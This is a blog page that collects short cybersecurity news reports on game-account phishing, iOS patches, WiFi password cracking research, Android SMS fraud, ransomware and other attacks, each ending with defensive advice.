Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Steam
Cyber Fraud PC Games Phishing Attacks Scam Steam

Users Warned About the Steam Scam Prevailing in the Wild

 

Another new internet fraud is circulating that may result in PC gamers losing access to their Steam accounts or perhaps getting their systems infected with a virus. 

Valve's Steam is a video game digital distribution service. In September 2003, it was released as a separate software client as a mechanism for Valve to give automatic updates for their games, and it was eventually expanded to also include titles from third-party publishers. 

If one has ever played a multiplayer online game, then they must be probably familiar with skins. Skins are decorative overlays for in-game goods that are widely traded in. These are, however, available to buy for either virtual or real money. 

Malwarebytes has issued a warning about a potential skins fraud that might result in users losing access to their accounts and their vast library of video games. As per a recent blog post from Malwarebytes Labs, one of the earliest frauds is skin phishing, wherein a scammer creates a false marketplace, a replica of a genuine game-themed lounge, or even a fake user's trade inventory page to breach an account. 

The fact that this strategy may be performed out in a very short period makes it highly risky. A scammer will commence by sending out a message with a malicious link to potential suspects on Steam or Discord. The messages are like this;

“Yo, I don’t know you, unfortunately, but this is for you, I do not need that knife [link]” 

“I haven’t met you, unfortunately (or not lol), but take it, I dont don’t need that skin [link]” 

After a user's Steam account has been compromised, they must contact the Steam assistance team to try to restore it, but by then, the fraudster has most likely altered their password as well as other login details. To make the matter worse, they might attempt identity theft by signing into a victim's additional online accounts with their Steam credentials. 

Malwarebytes suggests that Steam users must set two-factor authentication (2FA) for their accounts as well as avoid clicking on any URLs from unfamiliar persons in-game or online to safeguard themselves from this and other similar scams.
Read more »
Watering Hole attack
Apple Security Apple TV iPhone Mobile Security Security Updates Watering Hole attack

Apple Fixes Critical iOS Flaws; One Under Attack

 

Researchers discovered one significant flaw that could be exploited from the browser, allowing watering-hole assaults. 

On October 25 and 26, Apple released iOS 14.8.1, iPadOS 14.8.1, watchOS 8.1, and tvOS 15.1, fixing 24 CVEs overall. The CVEs are detailed on Apple's security website, and they include various problems in iOS components that, if abused, may result in arbitrary code execution, sometimes with kernel privileges that would allow an intruder to reach the core of the operating system.

In one incident of a memory-corruption issue in IOMobileFrameBuffer for Apple TV, Apple stated that it is "aware of a report that this problem may have been actively exploited ", a "maybe" that researchers substantiated. 

This one is especially concerning because researchers have previously discovered that the issue is exploitable via the browser, making it "ideal for one-click & waterholing mobile attacks," as per the mobile security firm ZecOps earlier this month. 

A watering-hole attack occurs when a threat actor places malware on websites that may attract a target in the hopes that someone may ultimately drop in and become infected. Justifiably, Apple keeps information confidential that may aid further attackers to create damage and attack. This flaw might allow an application to run arbitrary code with kernel privileges. 

Apple stated earlier this year that it would give users a choice: they could either update to iOS 15 as soon as it was available, or they could stay on iOS 14 and get essential security updates until they were ready to upgrade. 

In context with the reason behind the prompt decision, there have been speculations that it had something to do with an "urban mythology" about Apple deliberately slowing down older phones to entice consumers to upgrade. 

Maybe it's simply a popular conspiracy idea, but it's based on legal comeuppance, at least in terms of battery life: In 2017, Apple admitted to slowing down phones in order to prevent outdated batteries from abruptly shutting down devices. In November of last year, the corporation was fined $113 million to resolve an investigation into what was known as iPhone “batterygate.”
Read more »
WiFi
Cyber Security Israel Network Security Security Researchers Weak Password WiFi

70% of WiFi Networks in Tel Aviv were Cracked by a Researcher

 

In his hometown of Tel Aviv, a researcher cracked 70% of a 5,000 WiFi network sample, demonstrating that residential networks are extremely vulnerable and easy to hijack. Ido Hoorvitch, a CyberArk security researcher, first strolled about the city center using WiFi sniffing equipment to collect a sample of 5,000 network hashes for the study. 

The researcher then took the use of a vulnerability that allowed the extraction of a PMKID hash, which is typically generated for roaming purposes. Hoorvitch sniffed with WireShark on Ubuntu and utilized a $50 network card that can function as a monitor and a packet injection tool to collect PMKID hashes. 

Although Hoorvitch highlighted that this form of attack does not require such heavy-duty technology, the team deployed a 'monster' cracking rig made up of eight xQUADRO RTX 8000 (48GB) GPUs in CyberArk Labs. The attack is centered on a weakness found by Hashcat's primary developer, Jens 'atom' Steube. This bug can be used to obtain PMKID hashes and crack network passwords.

"Atom’s technique is clientless, making the need to capture a user’s login in real-time and the need for users to connect to the network at all obsolete," explains Hoorvitch in the report. "Furthermore, it only requires the attacker to capture a single frame and eliminate wrong passwords and malformed frames that are disturbing the cracking process." 

The generation and cracking of PMKs with SSIDs and different passphrases can then be used to crack PMKID hashes collected by wireless sniffers with monitor mode enabled. This data is created from the right WiFi password when a PMKID is generated that is equal to the PMKID acquired from an access point. Hoorvitch employed a conversion tool and Hashcat, a password recovery software, after sniffing out PMKID hashes with the Hcxdumptool utility. 

According to Hoorvitch, many Tel Aviv residents use their cellphone numbers as their WiFi password, thus it wasn't long before hashes were cracked, passwords were obtained, and doors to their networks were opened. Each crack on the researcher's laptop took around nine minutes in these circumstances. The team was able to break into over 3,500 WiFi networks in and around Tel Aviv. 

Despite the risk of being hacked, most consumers do not set a strong password for their WiFi networks, according to the report. Passwords should be at least ten characters long, contain a mix of lower and upper case letters, symbols, and numerals, and be unique. Keeping your router firmware up to date will also safeguard your hardware from attacks based on vulnerability exploits, according to the researcher. WAP/WAP1 and other weak encryption protocols should be disabled as well.
Read more »
Cyber Security
Cyber Security

Cybersecurity expert assessed the risks of QR code theft

 Stealing a QR code to confirm vaccination against coronavirus infection is theoretically possible. Cybersecurity specialist Sergey Vakulin told about this on October 26.

According to the expert, hackers can get to the QR code through remote access to the device on which the data is stored. They can also steal the code using a photo or video recording.

To avoid stealing information about vaccination with the help of video cameras or cameras, Vakulin recommended not to disclose the document in public places. In this case, the attacker will not be able to fix the QR code or the certificate ID.

“Even if a certificate identifier is obtained, an attacker can generate it himself with the help of a QR code constructor for a redirect to a government services website that stores information about certificates,” the specialist explained.

The expert warned that attackers can not only use the information received, but also sell it.

Roskomnadzor reported that since March 2021, 3,816 Internet resources that sold fake COVID-19 vaccination certificates and generated fake QR codes for attending public events have been removed or blocked.

In addition, Head of the Gamaleya Center academician Alexander Gintsburg noted that QR codes will remain an important element in the fight against COVID-19 until the necessary level of collective immunity can be achieved.

On October 25, the Ministry of Health approved the modified format of the COVID-19 vaccination certificate, which will consist of two sheets with a QR code and personal data of the patient with information about the vaccination, as well as contraindications and the coronavirus disease.

Recently, residents of Moscow were warned about a new type of fraud. Scammers call and offer to link a QR code confirming vaccination against coronavirus to bank or social cards. As a result, the money was debited from the account.

Read more »
User Privacy
Fraud Campaign Malicious Android Apps Mobile Security Phony Apps User Privacy

UltimaSMS Premium Fraud Campaign Exploits Millions of Android Devices

 

Avast researchers have unearthed a global SMS premium fraud campaign on the Google Play Store, dubbed UltimaSMS. Scammers used 151 Android apps with 10.5 million downloads from over 80 countries to trick users into signing up for premium services that can cost up to Rs.3,000 per month depending on their cell carrier and location. 

Scammers used a fake photo editor, spam call blockers, camera filter, games, and other apps and promoted them via Instagram and TikTok channels. Such phony apps were downloaded in large numbers by people in Pakistan, Saudi Arabia, Egypt, UAE, USA, Poland, and many countries in the Middle East. After discovering the fraud, Google has banned 150 malicious apps and also removed them from its PlayStore. 

Upon installing the malicious apps, scammers analyze the user’s location, International Mobile Equipment Identity (IMEI), and phone number to determine the language in which they must communicate with the user. When a user opens the app, a screen is displayed that requests user to enter their phone number, and in some cases, email address to secure access to the app’s advertised service or product. 

Avast researchers named the fraud campaign “UltimaSMS” because one of the first app researchers discovered in May 2021 was called Ultima Keyboard 3D pro. 

“Upon entering the requested details, the user is subscribed to premium SMS services that can charge upwards of $40 per month depending on the country and mobile carrier. Instead of unlocking the apps’ advertised features, which users might assume should happen, the apps will either display further SMS subscriptions options or stop working altogether.” reads the blog post published by Avast.” The sole purpose of the fake apps is to deceive users into signing up for premium SMS subscriptions.”

Tips to protect yourself from fraudulent SMS apps 

• Deactivate the premium SMS option from your carrier. Deactivating this option will nullify the UltimaSMS scam. 
• Make sure to read the reviews before downloading any such app. Reading reviews can help you find out the intent of the app. 
• Unless you trust the app, don't register your mobile number. 
• Read every notification that comes up while installing the app carefully and give any permission only after reading.
Read more »
Meteor
Cyber Attacks Data Wiping Malware Gas Stations Government Iran government IT Network Meteor

Cyberattack Disrupts Gas Stations Across Iran, Government Says

 

A software failure suspected to be the result of a cyberattack has affected gas stations across Iran and defaced gas pump displays and billboards with gas prices. 

The problem, which occurred on Tuesday had an impact on the IT network of  National Iranian Oil Products Distribution Company (NIOPDC), a state-owned gas distribution firm that control gas stations throughout Iran. The network, which has been supplying oil products for over 80 years, consists of more than 3,500 stations across the country.

According to local media sources and as well as photographs and videos posted on social media, the cyberattack led NIOPDC gas stations to display the words "cyberattack 64411" on their screens. The gas pumps could have been used to refill automobiles, but NIOPDC staff shut them off once the firm learned it couldn't trace and charge consumers for the fuel they poured in their vehicles. 

Additionally, NIOPDC-installed gas pricing signs in key cities displayed the same "cyberattack 64411" message, along with "Khamenei, where is the gas?" and "Free gas at [local gas station's name]." 

The phone number 64411 is for the office of Supreme Leader Ayatollah Ali Khamenei. The same number was also displayed on billboards at Iranian train stations during a cyberattack on July 9, when passengers were instructed to phone Iran's leader and inquire as to why their trains had been delayed. The July attack on Iranian train stations was eventually connected to Meteor, a type of data-wiping malware. 

Despite a flood of evidence shared on social media, the Ministry of Oil spokesperson dismissed reports of a "cyberattack" in an official statement made later and attributed the occurrence to a software glitch, according to Jahan News. The same publication later claimed that refuelling operations at impacted gas stations had resumed. 

Government officials also held an emergency conference in response to the event, and after getting a reprimand from the Iranian leadership, several Iranian news agencies deleted reports of a cyberattack.
Read more »
Mozilla Firefox
Cyber Security Firefox Add-On malicious Mozilla Firefox

Malicious Add-Ons Blocked by Mozilla Firefox

 

The Mozilla Firefox team recently restricted add-ons that have been misusing the proxy API, preventing approximately 455,000 users from upgrading their browsers. 

Mozilla's development team members Rachel Tublitz and Stuart Colville claimed in a Monday post that they had found the rogue add-ons in early June. The add-ons were exploiting the proxy API, that is used by APIs to manage how Firefox connects to the internet. 

Add-ons are advanced software pieces that may be installed to Firefox or other programs to personalize the browser by performing things like limiting tracking, removing advertisements, downloading movies from websites, or translating information. 

However, from the other extreme, they may be malicious tiny creatures that install malware, such as the 28 Facebook, Vimeo, Instagram, as well as other add-ons discovered by experts last year in widely utilized Google and Microsoft browsers. The add-ons stole private data, seemed to have the capacity to activate more malware downloads, and altered links that victims clicked on to send them to phishing sites and advertisements. 

The Firefox team stated that the problematic Firefox add-ons discovered in June, dubbed Bypass and Bypass XM, were intercepting and redirecting users from downloading updates, accessing updated blocklists, and upgrading remotely set material. Mozilla has banned the rogue add-ons from being downloaded by more users. 

According to a blog post, Mozilla is now accepting new applications. The document also includes suggested parameters for Firefox add-on developers to assist accelerate add-on evaluation. 

Mozilla has also altered how well the browser handles key queries such as update requests. Beginning with Firefox 91.1, if an essential demand is performed through a proxy configuration that fails, Firefox will fall back on direct connections. 

“Ensuring these requests are completed successfully helps us deliver the latest important updates and protections to our users,” the Firefox developers said. 

To prevent such fraudulent add-ons, the team had installed a system add-on called Proxy Failover (ID: proxy-failover@mozilla.com). System add-ons — a means to ship Firefox extensions – are hidden, cannot be disabled, and may be updated without restarting the browser. According to Mozilla, Proxy Failover is now available in both current and older Firefox versions. 

Anyone who isn't using the newest version and hasn't disabled updates should check to see if they've been impacted by the malicious add-ons, according to Mozilla. The very first step is to attempt an upgrade of Firefox: Recent versions have an upgraded blocklist that removes harmful add-ons automatically.
Read more »
United States
Cyber Crime Double extortion Financial Data Ransomware RDP Sensitive data United States

Ransomware Ranzy Locker Infected at Least 30 US Organizations

 

The FBI announced on Monday that the Ranzy Locker ransomware has infected at least 30 US firms across a variety of industries this year. “Unknown cyber criminals using Ranzy Locker ransomware had compromised more than 30 US businesses as of July 2021. The victims include the construction subsector of the critical manufacturing sector, the academia subsector of the government facilities sector, the information technology sector, and the transportation sector,” reads the flash alert. 

The flash alert was issued in collaboration with CISA and is intended to provide information to security professionals to aid in the detection and prevention of ransomware attacks. The majority of Ranzy Locker victims who reported intrusions told the FBI that the attackers broke into their networks by brute-forcing RDP credentials. 

Others have recently revealed that the attackers utilized credentials acquired in phishing operations or targeted insecure Microsoft Exchange servers.

Ranzy Locker operators will steal unencrypted documents while within a victim's network before encrypting systems on their victims' corporate networks, a method utilized by most other ransomware gangs. These exfiltrated files, which contain sensitive information such as customer information, personally identifiable information (PII) data, and financial records, are used as leverage to force victims to pay a ransom in order to regain access to their files and prevent the data from being leaked online. 

In several cases, the gang used a double model of extortion, threatening victims with leaking stolen data if they did not pay the ransom. Indicators of compromise (IOCs) connected with Ranzy Locker operations and Yara rules to identify the threat are also included in the flash warning. 

Victims will get a 'Locked by Ranzy Locker' notice and a live chat screen to negotiate with the threat actors when they visit the group's Tor payment site. The ransomware operators also offer their victims to decrypt three files for free as part of this "service" to demonstrate that the decryptor can restore their files. 

Implement regular backups of all data to be stored as air-gapped, password-protected copies offline, implement network segmentation so that no machine on your network is accessible from any other machine, install and regularly update antivirus software on all hosts, and enable real-time detection, and install updates/patches to operating systems, software, and firmware as soon as updates/patches become available, are some of the recommended mitigations that were included in the alert.
Read more »
Russian Hackers
Cyber Attacks Hacker group Microsoft Russian Hackers

Microsoft reported thousands of cyberattacks by the Russian hacker group

Microsoft has announced the activation of the Nobelium cyber group, which attacked the American software developer SolarWinds more than a year ago and gained access to US government data.

Microsoft has reported that a hacker group allegedly linked to Russian intelligence has significantly intensified its activities in recent months. From the beginning of July to mid-October, the hacker group carried out 22.9 thousand cyber attacks on 609 companies.

However, Russian experts do not agree at all with Microsoft representatives. So, Alexey Lukatsky, Cisco information security consultant, said that no one has shown evidence that hackers from Russia are behind the Nobelium hacker group.
According to him, if an attack is carried out from Russian IP addresses and code fragments have previously been attributed to Russian hackers (often also without evidence), experts conclude that Russians are behind the attack.
“It is now fashionable to accuse Russia of cyber attacks, as some countries allocate large budgets to increase the level of protection against cyber attacks and some companies believe that it is easy to get them to fight a known enemy,” said Lukatsky.

Anastasia Tikhonova, head of the Threat Intelligence Group-IB complex threat research group, also believes that there is no clear evidence that Russian hackers are behind the activities of the Dark Halo (Nobelium) group.
“No tactics, techniques and procedures that could prove intersections between the actions of Dark Halo (Nobelium) and another well-known group of attackers were presented, except perhaps a comparison of the Sunburst backdoor used by Dark Halo (Nobelium) with the Kazuar RAT, which is used by hackers of the Turla group,” added she. 

Sergey Nenakhov, Head of the Information Security Audit Department at Infosecurity, agrees with Tikhonova and Lukatsky. According to him, in order to draw conclusions about the involvement of a particular group of hackers in the attack, companies must have access to a large amount of telemetry data that can be collected by a very limited number of them. Microsoft, as a major player, can afford such an investigation, but it is unclear how independent this company is from political interference, Nenakhov said.
Read more »
User Security
Cyber Attacks DDOS Attack South Korea Telecom Firm User Security

South Korean Telecom Operator Crippled by DDoS Attack

 

South Korean telecommunications operator KT suffered a nationwide network outage earlier this week, affecting its telephone and wireless services including phone calls, internet, and other services.

The suspected distributed denial-of-service (DDoS) attack crippled the network for almost an hour. Customers using the telco's network were unable to access the internet for around 40 minutes at around 11am on Monday. Since then, general access to the Internet has been restored for KT users in most parts of the country. 

To investigate the matter, a team of security experts from the Seoul cyber department was dispatched to KT's headquarters in Seongnam, Gyeonggi Province, just south of Seoul. Later in the day, KT restated that the outage appeared to have been caused by large-scale DDoS attacks. The firm said it is still looking for the culprits behind the DDoS and will continue to analyze the extent of the damage. 

“The telco's network was shut down due to a large-scale DDoS attack. During the outage, the company's crisis management team was working to quickly restore the network back to normal. KT is yet to figure out the extent of the damage or who was behind the DDoS attack,” KT spokesperson stated. 

The Ministry of Science and ICT said they are keeping a close eye on the matter in collaboration with KT. However, the ministry did not confirm that the network failure was caused by a DDoS attack, but it said the other major telcos SK Telecom and LG Uplus were not affected.

Despite not being victims of the DDoS attack, users of the services of SK Telecom and LG Uplus raised complaints on social media regarding telcos network outages. Spokespersons for these telcos said the network outages were due to a sudden surge in traffic from KT users switching their services due to KT’s internet outage. Both SK Telecom and LG Uplus representatives said they would be monitoring the situation closely. 

According to the Science and ICT Ministry data, around 16.3 million people are dependent on KT for internet service as of March 2021. The last time KT suffered a network outage was in 2018 when a fire broke at its Ahyeon branch in central Seoul. The fire caused internet and phone service disruptions in nearby areas, including the Seoul districts of Jung-gu, Yongsan-gu, and Seodaemun-gu.
Read more »
UpdateAgent
Cyber Security Mac macOS Microsoft UpdateAgent

Microsoft Cautions Regarding a new Version of UpdateAgent Aimed at MacOS

 

Microsoft Security Intelligence researchers have found a new variant of UpdateAgent (aka WizardUpdate) which attacks Mac devices. The spyware, which was discovered in November 2020, may also install adware on macOS. According to the business, the new variation includes a variety of additional features that make it extremely challenging to identify and remove owing to greater persistence and escape methods. 

The virus may also exploit public cloud infrastructure to serve new payloads, which is another harmful capability. For example, when UpdateAgent is infected, it downloads additional adware known as Adload. 

“We recently discovered the latest variant of a Mac malware tracked as UpdateAgent (aka WizardUpdate) with new persistence and evasion tactics, the latest in a series of upgrades over the past year. Given its history, this Trojan will likely continue to grow in sophistication,” Microsoft tweeted. 

An additional feature of the virus is the ability to host multiple payloads on public cloud infrastructure. Adload is new adware that UpdateAgent installs as part of the extra malware.

The virus can gather computer information and transfer it to a command and control site. Notably, it is capable of circumventing Apple's Gatekeeper security function. It accomplishes this by removing the quarantine properties from the downloaded file. 

The core of macOS security is Gatekeeper; it prevents harmful apps from being installed by requiring code signing. UpdateAgent, like OSX/Dok malware, can easily circumvent Gatekeeper security, making it a persistent danger. 

Furthermore, PlistBuddy is used by cybercriminals to establish persistence. Malware often attempts to destroy produced directories, files, and other artifacts to hide its tracks. PlistBuddy is a built-in Mac software that allows users to edit.plist files. 

“The malware also leverages existing user permissions to create folders on the affected device. It uses PlistBuddy to create and modify Plists in LaunchAgent/LaunchDeamon for persistence. It then covers its tracks by deleting created folders, files, and other artifacts,” researchers tweeted. 

The new edition impersonates legal software as well; nevertheless, Microsoft did not specify whose software is being impersonated. The virus is suspected to be propagated via drive-by downloads.
Read more »
Subscribe to: Comments (Atom)